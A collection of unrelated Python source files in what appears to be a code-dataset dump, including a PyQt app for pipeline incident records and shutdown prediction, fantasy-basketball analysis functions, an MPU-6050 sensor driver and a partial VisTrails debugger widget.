self.tableWidget_2.setColumnCount(len(data[0])) # Assuming all rows have the same number of columns\r\n\r\n # Add data to the table\r\n for i, row in enumerate(data):\r\n for j, value in enumerate(row):\r\n item = QTableWidgetItem(str(value))\r\n self.tableWidget_2.setItem(i, j, item)\r\n\r\n # Set table properties\r\n header_labels = [description[0] for description in cursor.description]\r\n self.tableWidget_2.setHorizontalHeaderLabels(header_labels)\r\n self.tableWidget_2.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n self.tableWidget_2.setSizeAdjustPolicy(QTableWidget.AdjustToContents)\r\n self.tableWidget_2.setEditTriggers(QTableWidget.NoEditTriggers)\r\n self.tableWidget_2.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)\r\n self.tableWidget_2.verticalHeader().setVisible(False)\r\n self.tableWidget_2.resizeRowsToContents()\r\n self.tableWidget_2.resizeColumnsToContents()\r\n\r\n # Retrieve data from the database table\r\n cursor.execute(\"SELECT * FROM Operators\")\r\n df = cursor.fetchall()\r\n\r\n # Set the number of rows and columns in the table\r\n self.tableWidget_3.setRowCount(len(df))\r\n self.tableWidget_3.setColumnCount(len(df[0])) # Assuming all rows have the same number of columns\r\n\r\n # Add data to the table\r\n for i, row in enumerate(df):\r\n for j, value in enumerate(row):\r\n item = QTableWidgetItem(str(value))\r\n self.tableWidget_3.setItem(i, j, item)\r\n\r\n # Set table properties\r\n header_labels = [description[0] for description in cursor.description]\r\n self.tableWidget_3.setHorizontalHeaderLabels(header_labels)\r\n self.tableWidget_3.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n self.tableWidget_3.setSizeAdjustPolicy(QTableWidget.AdjustToContents)\r\n self.tableWidget_3.setEditTriggers(QTableWidget.NoEditTriggers)\r\n self.tableWidget_3.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)\r\n self.tableWidget_3.verticalHeader().setVisible(False)\r\n self.tableWidget_3.resizeRowsToContents()\r\n self.tableWidget_3.resizeColumnsToContents()\r\n\r\n # Close the database connection\r\n conn.close()\r\n \r\n \r\n def add_value(self):\r\n # Connect to the database\r\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\r\n db.setDatabaseName(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n \r\n if not db.open():\r\n print(\"Failed to connect to the database.\")\r\n return\r\n\r\n # Get input values\r\n AccidentDateTime = self.dateTimeEdit.dateTime().toString(\"yyyy-MM-dd HH:mm:ss\")\r\n PipelineLocation = self.comboBox_2.currentText()\r\n PipelineFacilityName = self.lineEdit_8.text()\r\n OpertorName = self.comboBox_19.currentText()\r\n PipelineType = self.comboBox.currentText()\r\n LiquidType = self.comboBox_3.currentText()\r\n AccidentState = self.comboBox_14.currentText()\r\n AccidentLatitude = self.lineEdit.text()\r\n AccidentLongitude = self.lineEdit_2.text()\r\n CauseCategory = self.comboBox_4.currentText()\r\n CauseSubcategory = self.comboBox_15.currentText()\r\n UnintentionalRelease = self.lineEdit_3.text()\r\n PipelineShutdown = self.comboBox_5.currentText()\r\n PropertyDamageCosts = self.lineEdit_4.text()\r\n LiquidIgnition = self.comboBox_16.currentText()\r\n LiquidExplosion = self.comboBox_17.currentText()\r\n\r\n# Check for empty fields\r\n if (\r\n not AccidentDateTime\r\n or not PipelineFacilityName\r\n or not OpertorName\r\n or not AccidentLatitude\r\n or not AccidentLongitude\r\n or not UnintentionalRelease\r\n or not PropertyDamageCosts\r\n ):\r\n QMessageBox.warning(\r\n self,\r\n \"Empty Fields\",\r\n \"Please fill in all the required fields.\",\r\n QMessageBox.Ok,\r\n )\r\n return\r\n\r\n # Convert input values to float\r\n try:\r\n AccidentLatitude = float(AccidentLatitude)\r\n AccidentLongitude = float(AccidentLongitude)\r\n UnintentionalRelease = float(UnintentionalRelease)\r\n PropertyDamageCosts = float(PropertyDamageCosts)\r\n except ValueError:\r\n QMessageBox.warning(\r\n self,\r\n \"Invalid Values\",\r\n \"Please enter valid numeric values for latitude, longitude, unintentional release, and property damage costs.\",\r\n QMessageBox.Ok,\r\n )\r\n return\r\n # Validate latitude and longitude\r\n if not self.is_valid_location(AccidentLatitude, AccidentLongitude):\r\n QMessageBox.warning(self, \"Invalid Location\", \"Invalid latitude and longitude. Please provide a location within the continental United States.\", QMessageBox.Ok)\r\n return\r\n #check for empty fields\r\n\r\n # Perform other necessary validations and error handling here\r\n # Retrieve the accident year\r\n accident_year = self.dateTimeEdit.date().year()\r\n # Generate report number\r\n count_query = QSqlQuery()\r\n count_query.prepare(\"SELECT MAX(\\\"Report Number\\\") FROM Incidents\")\r\n count_query.exec_()\r\n count_query.next()\r\n last_report_number = count_query.value(0)\r\n if last_report_number is not None:\r\n last_report_number_str = str(last_report_number)\r\n last_report_number_numeric = int(last_report_number_str[len(str(accident_year)):])\r\n count = last_report_number_numeric + 1\r\n else:\r\n count = 1\r\n reportnumber = int(f\"{accident_year}{count:04d}\")\r\n\r\n\r\n\r\n # Check if the entered Facility Name exists in the Pipelines table\r\n facility_name = PipelineFacilityName.strip()\r\n pipeline_query = QSqlQuery()\r\n pipeline_query.prepare(\"SELECT COUNT(*) FROM Pipelines WHERE \\\"Pipeline/Facility Name\\\" = ?\")\r\n pipeline_query.addBindValue(facility_name)\r\n pipeline_query.exec_()\r\n pipeline_query.next()\r\n count = pipeline_query.value(0)\r\n\r\n if count == 0:\r\n QMessageBox.warning(self, \"Invalid Facility Name\", \"Please enter a valid Facility Name.\")\r\n return\r\n\r\n\r\n # Prepare the SQL query\r\n query = QSqlQuery()\r\n operatorQuery = QSqlQuery()\r\n operatorQuery.prepare(\"SELECT \\\"Operator ID\\\" FROM Operators WHERE \\\"Operator Name\\\" = ?\")\r\n operatorQuery.addBindValue(OpertorName)\r\n operatorQuery.exec()\r\n operatorQuery.next()\r\n operatorId = operatorQuery.value(0)\r\n query.prepare(\"INSERT INTO Incidents (\\\"Report Number\\\", \\\"Accident Date/Time\\\", \\\"Operator ID\\\", \\\"Pipeline/Facility Name\\\", \\\"Pipeline Type\\\", \\\"Liquid Type\\\", \\\"Accident State\\\", \\\"Accident Latitude\\\", \\\"Accident Longitude\\\", \\\"Cause Category\\\", \\\"Cause Subcategory\\\", \\\"Unintentional Release (Barrels)\\\", \\\"Liquid Ignition\\\", \\\"Liquid Explosion\\\", \\\"Pipeline Shutdown\\\") VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\")\r\n query.addBindValue(reportnumber)\r\n query.addBindValue(AccidentDateTime)\r\n query.addBindValue(operatorId)\r\n query.addBindValue(PipelineFacilityName)\r\n query.addBindValue(PipelineType)\r\n query.addBindValue(LiquidType)\r\n query.addBindValue(AccidentState)\r\n query.addBindValue(AccidentLatitude)\r\n query.addBindValue(AccidentLongitude)\r\n query.addBindValue(CauseCategory)\r\n query.addBindValue(CauseSubcategory)\r\n query.addBindValue(UnintentionalRelease)\r\n query.addBindValue(LiquidIgnition)\r\n query.addBindValue(LiquidExplosion)\r\n query.addBindValue(PipelineShutdown)\r\n \r\n # Execute the SQL query\r\n if not query.exec_():\r\n print(\"Failed to insert values into the table.\")\r\n print(query.lastError().text())\r\n db.rollback()\r\n else:\r\n db.commit()\r\n QMessageBox.information(self, \"Success\", \"The incident was successfully added.\")\r\n\r\n # Close the database connection\r\n db.close()\r\n\r\n # Clear the input fields\r\n self.clear_fields()\r\n\r\n def clear_fields(self):\r\n self.dateTimeEdit.setDateTime(QDateTime.currentDateTime())\r\n self.comboBox_2.setCurrentIndex(0)\r\n self.lineEdit_8.clear()\r\n self.comboBox_19.setCurrentIndex(0)\r\n self.comboBox.setCurrentIndex(0)\r\n self.comboBox_3.setCurrentIndex(0)\r\n self.comboBox_14.setCurrentIndex(0)\r\n self.lineEdit.clear()\r\n self.lineEdit_2.clear()\r\n self.comboBox_4.setCurrentIndex(0)\r\n self.comboBox_15.setCurrentIndex(0)\r\n self.lineEdit_3.clear()\r\n self.comboBox_5.setCurrentIndex(0)\r\n self.lineEdit_4.clear()\r\n self.comboBox_16.setCurrentIndex(0)\r\n self.comboBox_17.setCurrentIndex(0)\r\n def is_valid_location(self, latitude, longitude):\r\n # Define the valid range for latitude and longitude within the continental United States\r\n valid_latitude_range = (24.396308, 49.384358)\r\n valid_longitude_range = (-125.000000, -66.934570)\r\n\r\n # Check if latitude and longitude values are within the valid range\r\n if latitude >= valid_latitude_range[0] and latitude <= valid_latitude_range[1] and \\\r\n longitude >= valid_longitude_range[0] and longitude <= valid_longitude_range[1]:\r\n return True\r\n else:\r\n return False \r\n def search_table(self):\r\n search_text = self.lineEdit_5.text().lower()\r\n\r\n for row in range(self.tableWidget.rowCount()):\r\n row_match = False\r\n for column in range(self.tableWidget.columnCount()):\r\n item = self.tableWidget.item(row, column)\r\n if item.text().lower().startswith(search_text):\r\n row_match = True\r\n item.setBackground(QBrush(QColor(255, 255, 153))) # Highlight the cell background color\r\n else:\r\n item.setBackground(QBrush(Qt.NoBrush)) # Reset the cell background color\r\n\r\n self.tableWidget.setRowHidden(row, not row_match) # Show/hide the row based on the match\r\n \r\n\r\n def predict_shutdown(self):\r\n \r\n accident_datetime =self.dateTimeEdit_2.dateTime().toString(\"yyyy-MM-dd HH:mm:ss\")\r\n pipeline_location = self.comboBox_6.currentText()\r\n pipeline_type = self.comboBox_7.currentText()\r\n liquid_type = self.comboBox_8.currentText()\r\n accident_state=self.comboBox_10.currentText()\r\n accident_latitude = self.lineEdit_6.text()\r\n accident_longitude =self.lineEdit_7.text()\r\n cause_category = self.comboBox_9.currentText()\r\n cause_subcategory=self.comboBox_11.currentText()\r\n liquid_ignition=self.comboBox_12.currentText()\r\n liquid_explosion=self.comboBox_13.currentText()\r\n if (\r\n not accident_latitude\r\n or not accident_longitude\r\n \r\n ):\r\n QMessageBox.warning(\r\n self,\r\n \"Empty Fields\",\r\n \"Please fill in all the required fields.\",\r\n QMessageBox.Ok,\r\n )\r\n return\r\n accident_latitude = float(accident_latitude)\r\n accident_longitude = float(accident_longitude) \r\n print(accident_datetime)\r\n print(pipeline_location)\r\n print(pipeline_type)\r\n print(liquid_type)\r\n print(accident_latitude)\r\n print(accident_longitude)\r\n print(cause_category)\r\n \r\n if not self.is_valid_location(accident_latitude, accident_longitude):\r\n QMessageBox.warning(self, \"Invalid Location\", \"Invalid latitude and longitude. Please provide a location within the continental United States.\", QMessageBox.Ok)\r\n return\r\n # Load the trained model\r\n with open('model.pkl', 'rb') as file:\r\n model = pickle.load(file)\r\n \r\n # Create a DataFrame with the input values\r\n input_data = pd.DataFrame({\r\n 'Pipeline Location': [pipeline_location],\r\n 'Pipeline Type': [pipeline_type],\r\n 'Liquid Type': [liquid_type],\r\n 'Accident Latitude': [accident_latitude],\r\n 'Accident Longitude': [accident_longitude],\r\n 'Cause Category': [cause_category]\r\n})\r\n \r\n column_names = [ 'Accident Latitude', 'Accident Longitude', 'OFFHORE', 'ONSHORE', 'ABOVEGROUND', 'TANK', 'TRANSITION AREA', 'UNDERGROUND', 'ALL OTHER CAUSES', 'CORROSION', 'EXCAVATION DAMAGE', 'INCORRECT OPERATION', 'MATERIAL/WELD/EQUIP FAILURE', 'NATURAL FORCE DAMAGE', 'OTHER OUTSIDE FORCE DAMAGE', 'BIOFUEL / ALTERNATIVE FUEL(INCLUDING ETHANOL BLENDS)', 'CO2 (CARBON DIOXIDE)', 'CRUDE OIL', 'HVL OR OTHER FLAMMABLE OR TOXIC FLUID, GAS', 'REFINED AND/OR PETROLEUM PRODUCT (NON-HVL), LIQUID']\r\n\r\n\r\n categorical_cols = ['Pipeline Location', 'Pipeline Type', 'Liquid Type', 'Cause Category']\r\n# One-hot encode the categorical columns in the input data without prefix\r\n input_data_encoded = pd.get_dummies(input_data, columns=categorical_cols, prefix='', prefix_sep='')\r\n\r\n# Get the feature names after one-hot encoding\r\n feature_names = input_data_encoded.columns.tolist()\r\n\r\n# Make sure the input data columns are in the same order as the trained model's features\r\n input_data_encoded = input_data_encoded.reindex(columns=column_names, fill_value=0)\r\n\r\n# Add missing columns if any (i.e., if the input data has fewer categories than the trained model)\r\n missing_cols = set(column_names) - set(input_data_encoded.columns)\r\n for col in missing_cols:\r\n input_data_encoded[col] = 0\r\n print(input_data_encoded.to_string(index=False))\r\n# Make the prediction\r\n prediction = model.predict(input_data_encoded)\r\n\r\n print(prediction[0])\r\n # Display the prediction\r\n if prediction[0] == 0 :\r\n self.label_22.setText(\"NO\")\r\n predicted_value=\"NO\"\r\n else:\r\n self.label_22.setText(\"YES\")\r\n predicted_value=\"YES\"\r\n # Connexion à la base de données\r\n conn = sqlite3.connect('spdb.db')\r\n cursor = conn.cursor()\r\n \r\n # Obtenir le nombre total de lignes dans la table \"Prediction\"\r\n # cursor.execute(\"SELECT COUNT(*) FROM Prediction\")\r\n # result = cursor.fetchone()\r\n # num_predictions = result[0] + 1\r\n current_date = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n\r\n insert_query = \"INSERT INTO Prediction (\\\"Accident Date/Time\\\", \\\"Pipeline Type\\\", \\\"Liquid Type\\\", \\\"Accident State\\\", \\\"Accident Latitude\\\", \\\"Accident Longitude\\\", \\\"Cause Category\\\", \\\"Cause Subcategory\\\", \\\"Liquid Ignition\\\", \\\"Liquid Explosion\\\", \\\"Predicted Shutdown\\\", \\\"Prediction Date/Time\\\") VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\"\r\n\r\n values = (accident_datetime, pipeline_type, liquid_type, accident_state, accident_latitude, accident_longitude, cause_category, cause_subcategory, liquid_ignition, liquid_explosion, predicted_value, current_date)\r\n\r\n cursor.execute(insert_query, values)\r\n \r\n\r\n conn.commit()\r\n conn.close()\r\n self.dateTimeEdit_2.setDateTime(QtCore.QDateTime.currentDateTime()) # Set the date/time to current date/time\r\n self.comboBox_6.setCurrentIndex(0) # Set the pipeline location to the default value (index 0)\r\n self.comboBox_7.setCurrentIndex(0) # Set the pipeline type to the default value (index 0)\r\n self.comboBox_8.setCurrentIndex(0) # Set the liquid type to the default value (index 0)\r\n self.comboBox_10.setCurrentIndex(0) # Set the accident state to the default value (index 0)\r\n self.lineEdit_6.clear() # Clear the accident latitude input\r\n self.lineEdit_7.clear() # Clear the accident longitude input\r\n self.comboBox_9.setCurrentIndex(0) # Set the cause category to the default value (index 0)\r\n self.comboBox_11.setCurrentIndex(0) # Set the cause subcategory to the default value (index 0)\r\n self.comboBox_12.setCurrentIndex(0) # Set the liquid ignition to the default value (index 0)\r\n self.comboBox_13.setCurrentIndex(0)\r\n \r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication([])\r\n window1 = Window1()\r\n window1.show()\r\n app.exec_()\r\n","repo_name":"emerald-zzz/decision-support-system","sub_path":"applicationv01.py","file_name":"applicationv01.py","file_ext":"py","file_size_in_byte":73678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33584595025","text":"import os\nimport pandas as pd\n\ndef aggregatePlayerStats(data, player_list):\n\n team_data = data[data['player'].isin(player_list)] #subset data in the player list\n sum_data = team_data[['fga', '3pa', '2pa', 'fta',\n 'orb', 'drb', 'trb', 'ast', 'stl', 'blk', 'tov', 'pf', 'pts']].sum()\n avg_data = team_data[['2p%', '3p%', 'fg%', 'ft%', 'efg%', 'age', 'per', '3par',\n 'ftr', 'orb%', 'drb%', 'trb%', 'ast%', 'stl%', 'blk%', 'tov%',\n 'usg%', 'ows', 'dws', 'ws', 'ws/48', 'obpm', 'dbpm', 'bpm', 'vorp']].mean()\n final = pd.DataFrame(pd.concat([sum_data, avg_data], axis=0)).transpose()\n return final\n\ndef getZScores(player_list, player_data, season_average_data):\n \n #season_average_data must be for the season in question... subset before hand\\\n team_stats = aggregatePlayerStats(player_data, player_list)\n \n z_scores = list()\n #get mean/standard deviation for stats of specific season\n season_data = season_average_data.drop('season', axis=1) \n #find the columns that intersect between two data sets to iterate over\n columns = team_stats.columns[team_stats.columns.isin(season_average_data.columns)]\n \n for stat in columns:\n if stat not in ['tov', 'pf']: #if not turnovers or personal fouls\n # z = (X - X_bar) / SD\n z = (team_stats[stat][0] - season_data.loc['mean', stat])/season_data.loc['sd', stat]\n else:\n # z = -(X - X_bar) / SD\n z = -(team_stats[stat][0] - season_data.loc['mean', stat])/season_data.loc['sd', stat]\n \n z_scores.append(z)\n \n # Put it all together in a single DataFrame\n z_scores = pd.DataFrame(z_scores, columns = ['z_score'], index = columns)\n z_scores = z_scores.sort_values('z_score', ascending = True)\n return z_scores\n\ndef teamAssessment(data, bottom_n=3, top_n=3):\n \n strengths = list(data.tail(top_n).index)\n strengths.reverse() #reverse order\n weaknesses = list(data.head(bottom_n).index)\n \n results = {'weaknesses': \"Your weakest {} areas are (in order): {}\".format(str(bottom_n), str(weaknesses)),\n 'strengths': \"Your strongest {} areas are (in order): {}\".format(str(top_n), str(strengths))}\n \n return(results)\n\ndef salaryCap(player_list, salary_data, max_percentage):\n \n cap_total = 94.14 #hard coding for 2016\n cap_starters = cap_total * (max_percentage/100)\n salary = (salary_data[salary_data['player'].isin(player_list)]['salary'].sum(axis=0))/1000000\n \n if salary > cap_starters:\n return {'total_salary': salary, 'starter_cap': cap_starters, 'over_cap': True}\n else:\n return {'total_salary': salary, 'starter_cap': cap_starters, 'over_cap': False}\n\ndef assessPlayerSwaps(player_list, player_data, season_average_data, salary_data, salary_cap):\n \n ###Issue: this returns nothing right now if there is no way to get under the salary cap given the players\n\n potential_swaps = pd.DataFrame() #empty data frame\n \n og_team_stats = aggregatePlayerStats(player_data, player_list) #get the average stats \n og_z_score = getZScores(player_list, player_data, season_average_data) #get z-score for each team stat\n og_cum_z_score = og_z_score.sum()[0] #get cumulative z score\n \n for player_new in player_data['player']:\n for player_og in player_list: #could add check here for whether player input is already on team\n new_player_list = [player_new if x == player_og else x for x in player_list] #create new player list\n\n salary = salaryCap(new_player_list, salary_data, 80)\n\n if salary['over_cap'] == True:\n continue\n\n new_team_stats = aggregatePlayerStats(player_data, new_player_list) #find stats for new team\n new_z_score = getZScores(new_player_list, player_data, season_average_data) #find z scores for new team\n new_cum_z_score = new_z_score.sum()[0] #find cumulative z score for new team\n\n cum_z_score_net_change = new_cum_z_score - og_cum_z_score #find net change in z score\n per_stat_diff = new_z_score - og_z_score #find per stat difference \n stats_improved_count = len(per_stat_diff[per_stat_diff['z_score'] > 0]) #how many stats improved\n \n #Assign variables\n new_team_stats['player_og'] = player_og \n new_team_stats['player_new'] = player_new\n new_team_stats['cum_z_score_og'] = og_cum_z_score\n new_team_stats['cum_z_score_new'] = new_cum_z_score\n new_team_stats['cum_z_score_net_change'] = cum_z_score_net_change\n new_team_stats['stats_improved_count'] = stats_improved_count\n \n #Concatentate with final df\n potential_swaps = pd.concat([potential_swaps, new_team_stats], axis=0)\n \n return(potential_swaps) #return results of all potential swaps.\n\ndef recommendPlayer(player_list, player_swap_data, return_new_team_list=False):\n best_swap = player_swap_data[player_swap_data['cum_z_score_net_change'] ==\n max(player_swap_data['cum_z_score_net_change'])]\n \n if return_new_team_list == False:\n \tfinal = \"You should drop {} and add {}, he should help the team in {} statistical categories.\".format(\n \tbest_swap['player_og'][0], best_swap['player_new'][0], best_swap['stats_improved_count'][0])\n else:\n \tfinal = [best_swap['player_new'][0] if x == best_swap['player_og'][0] else x for x in player_list]\n \n return(final)","repo_name":"vikdad1/fantasy_basketball","sub_path":"app/functions/playerSwap.py","file_name":"playerSwap.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27400182741","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nCreated on Sun Sep 16 17:32:29 2018\r\n\r\n@author: 刘雪晴\r\n\"\"\"\r\n\r\n#1.导入数据集\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.cross_validation import KFold\r\n \r\ntrainX=pd.read_csv('trainx.csv')\r\ntrainY=pd.read_csv('trainy.csv')\r\ntestX=pd.read_csv('testx.csv')\r\n\r\n#2.对trainX和testX进行缺失值处理\r\nfrom sklearn import preprocessing\r\npre=preprocessing.Imputer(missing_values='NaN')\r\n#fit_transform先拟合数据再标准化\r\ntrainX=pre.fit_transform(trainX)\r\ntestX=pre.fit_transform(testX)\r\n\r\n\r\n#3.k折交叉验证,划分训练集和测试集\r\nX =np.array(trainX)\r\nY =np.array(trainY)\r\n\r\nkf = KFold(X.shape[0], n_folds=20)\r\nKFold(X.shape[0],n_folds=20)\r\nfor train_index, test_index in kf:\r\n X_train, X_test = X[train_index], X[test_index]\r\n Y_train, Y_test = Y[train_index], Y[test_index]\r\n \r\n#用随机森林\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nalg = RandomForestClassifier(random_state=1,n_estimators=100)\r\nalg.fit(X_train, Y_train)\r\nalg.predict\r\nprint('准确率:',alg.score(X_test, Y_test))\r\n","repo_name":"liuxueqing1023/compete","sub_path":"竞赛一/dataset/exam1.py","file_name":"exam1.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8217399999","text":"class calculator:\n num = 100\n\n def __init__(self, a, b):\n self.firstnumber = a\n self.secondnumber = b\n\n def getdata(self):\n print(\"It is a method in a class\")\n\n def summation(self):\n return self.firstnumber + self.secondnumber + calculator.num\n\n\nobj = calculator(2,3)\nobj.getdata()\nprint(obj.summation())\n\n\nobj1 = calculator(4, 5)\nobj1.getdata()\nprint(obj1.summation())","repo_name":"harsha-dendi/Py-OOPS","sub_path":"oops.py","file_name":"oops.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24841037793","text":"from typing import Union, Optional\n\nimport numpy as np\n\n\ndef proportion(\n x1: Union[np.float32, np.ndarray],\n x2: Union[np.float32, np.ndarray],\n y1: Union[np.float32, np.ndarray],\n y2: Union[np.float32, np.ndarray],\n *,\n solve_for: Optional[str] = None\n) -> None:\n \"\"\"Solves for either `[x1, x2, y1, y2]`, when they are `zeros`.\n\n This is the implementation of the **arithmetic proportion algorithm** that\n solves for either the numerator or the denominator from either side given the\n other values.\n\n .. math::\n\n \\\\dfrac{x_{1}}{y_{1}} = \\\\dfrac{x_{2}}{y_{2}}\n\n This function modifies the values of the `zero` vector in-place.\n\n .. note::\n\n In cases of more than one possible `zero_like` numpy vector, you must\n specify explicitly for the variable the function must solve for. Otherwise,\n the first found variable that is `zero` will be assumed to solve for.\n\n The order in which the algorithm decides for which variable to solve for is:\n * `x1`\n * `x2`\n * `y1`\n * `y2`\n\n Args:\n x1: NumPy vector for the left side numerator.\n x2: NumPy vector for the right side numerator.\n y1: NumPy vector for the left side denominator.\n y2: NumPy vector for the right side denominator.\n\n Raises:\n ValueError: If neither of `[x1, x2, y1, y2]` are `zeros`.\n ZeroDivisionError: If the denominator in the final equation is `zero`.\n\n Examples:\n\n >>> # Example 1: Solve for x1 when x2, y1, and y2 are known\n >>> x1 = np.zeros(3)\n >>> x2 = np.array([3.0, 4.0, 5.0])\n >>> y1 = np.array([6.0, 7.0, 8.0])\n >>> y2 = np.array([9.0, 10.0, 11.0])\n >>> proportion(x1, x2, y1, y2, solve_for='x1')\n >>> x1\n ... array([2., 2.8, 3.63636364])\n \"\"\"\n if solve_for is None:\n if np.all(x1 == 0):\n solve_for = 'x1'\n elif np.all(x2 == 0):\n solve_for = 'x2'\n elif np.all(y1 == 0):\n solve_for = 'y1'\n elif np.all(y2 == 0):\n solve_for = 'y2'\n\n if solve_for is None:\n raise ValueError(\n (\n 'Atleast numerator or denominator must be all zeros from either side to'\n ' calculate proportion.'\n )\n )\n\n if solve_for == 'x1':\n if np.any(y2 == 0):\n raise ZeroDivisionError('The denominator `y2` cannot be zero.')\n x1[...] = np.divide(np.multiply(x2, y1), y2)\n elif solve_for == 'x2':\n if np.any(y1 == 0):\n raise ZeroDivisionError('The denominator `y1` cannot be zero.')\n x2[...] = np.divide(np.multiply(x1, y2), y1)\n elif solve_for == 'y1':\n if np.any(x2 == 0):\n raise ZeroDivisionError('The denominator `x2` cannot be zero.')\n y1[...] = np.divide(np.multiply(x1, y2), x2)\n elif solve_for == 'y2':\n if np.any(x1 == 0):\n raise ZeroDivisionError('The denominator `x1` cannot be zero.')\n y2[...] = np.divide(np.multiply(x2, y1), x1)\n","repo_name":"Rishabh-Dhami/ai","sub_path":"ai/mathematical_functions/arithmetic_operations.py","file_name":"arithmetic_operations.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"13032368190","text":"from typing import List\nfrom math import log2\n\nfrom treehopper.api import I2C\nfrom treehopper.libraries import SMBusDevice\nfrom treehopper.libraries.sensors.inertial.mpu6050_registers import Mpu6050Registers\nfrom treehopper.libraries.sensors.inertial import Accelerometer, Gyroscope\nfrom treehopper.libraries.sensors.temperature.temperature_sensor import TemperatureSensor\nfrom treehopper.libraries.smbus_register_manager_adapter import SMBusRegisterManagerAdapter\n\n\nclass Mpu6050(Accelerometer, Gyroscope, TemperatureSensor):\n \"\"\"Invensense MPU-6050 6-axis IMU\"\"\"\n @staticmethod\n def probe(i2c: I2C, include_mpu9250: bool) -> List['Mpu6050']:\n devs = [] # type: List['Mpu6050']\n try:\n dev = SMBusDevice(0x68, i2c, 100)\n who_am_i = dev.read_byte_data(0x75)\n if who_am_i == 0x68 or (who_am_i == 0x71 and include_mpu9250):\n devs.append(Mpu6050(i2c, False))\n except RuntimeError:\n pass\n\n try:\n dev = SMBusDevice(0x69, i2c, 100)\n who_am_i = dev.read_byte_data(0x75)\n if who_am_i == 0x68 or (who_am_i == 0x71 and include_mpu9250):\n devs.append(Mpu6050(i2c, False))\n except RuntimeError:\n pass\n\n return devs\n\n def __init__(self, i2c: I2C, alt_address=False, rate=100):\n super().__init__()\n self._dev = SMBusDevice((0x69 if alt_address else 0x68), i2c, rate)\n self._registers = Mpu6050Registers(SMBusRegisterManagerAdapter(self._dev))\n self._registers.powerMgmt1.reset = 1\n self._registers.powerMgmt1.write()\n self._registers.powerMgmt1.reset = 0\n self._registers.powerMgmt1.sleep = 0\n self._registers.powerMgmt1.write()\n self._registers.powerMgmt1.clockSel = 1\n self._registers.powerMgmt1.write()\n self._registers.configuration.dlpf = 3\n self._registers.configuration.write()\n self._registers.sampleRateDivider.value = 4\n self._registers.sampleRateDivider.write()\n self._registers.accelConfig2.read()\n self._registers.accelConfig2.accelFchoice = 0\n self._registers.accelConfig2.dlpfCfg = 3\n self._registers.accelConfig2.write()\n self.accel_scale = 2\n\n @property\n def accel_scale(self):\n return 2*pow(2, self._registers.accelConfig.accelScale)\n\n @accel_scale.setter\n def accel_scale(self, value: int):\n if value != 2 and value != 4 and value != 8 and value != 16:\n raise ValueError(\"Accelerometer scale must be 2, 4, 8, or 16\")\n self._registers.accelConfig.accelScale = int(log2(value)-1)\n self._registers.accelConfig.write()\n\n def update(self):\n self._registers.readRange(self._registers.accel_x, self._registers.gyro_z)\n self._accelerometer = [self._registers.accel_x.value * self.accel_scale / 32768.0,\n self._registers.accel_y.value * self.accel_scale / 32768.0,\n self._registers.accel_z.value * self.accel_scale / 32768.0]\n\n self._gyroscope = [self._registers.gyro_x.value,\n self._registers.gyro_y.value,\n self._registers.gyro_z.value]\n\n self._celsius = self._registers.temp.value / 333.87 + 21.0","repo_name":"treehopper-electronics/treehopper-sdk","sub_path":"Python/treehopper/libraries/sensors/inertial/mpu6050.py","file_name":"mpu6050.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"12814233467","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('student', '0010_remove_payment_user_id'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='payment',\r\n name='user_id',\r\n field=models.IntegerField(default=1),\r\n preserve_default=False,\r\n ),\r\n ]\r\n","repo_name":"asp3/StudentAccounts","sub_path":"student/migrations/0011_payment_user_id.py","file_name":"0011_payment_user_id.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"858288994","text":"from __future__ import division\n\nfrom PyQt4 import QtGui, QtCore\nfrom vistrails.core.modules.vistrails_module import ModuleError\nimport vistrails.core.system\nimport copy\nimport sys\nimport time\nimport os.path\nimport vistrails.gui.application\nfrom vistrails.core.interpreter.default import get_default_interpreter\nfrom vistrails.gui.vistrails_palette import QVistrailsPaletteInterface\n\n############################################################################\n\nclass QDebugger(QtGui.QWidget, QVistrailsPaletteInterface):\n \"\"\"\n This class provides a dockable interface to the debugger tree.\n \"\"\"\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent=parent)\n self.app = vistrails.gui.application.get_vistrails_application()\n self.inspector = QObjectInspector()\n layout = QtGui.QVBoxLayout()\n layout.setMargin(0)\n layout.setSpacing(0)\n layout.addWidget(self.inspector)\n self.setLayout(layout)\n # self.setTitleBarWidget(QtGui.QLabel(\"Debugger\"))\n self.setWindowTitle(\"Debugger\")\n self.controller = None\n self.vistrails_interpreter = get_default_interpreter()\n self.vistrails_interpreter.debugger = self\n\n def set_controller(self, c):\n \"\"\"\n set_controller(c) -> None\n Set the current vistrails controller to be used by the debugger\n \"\"\"\n self.controller = c\n self.update()\n\n def update_values(self):\n \"\"\"\n 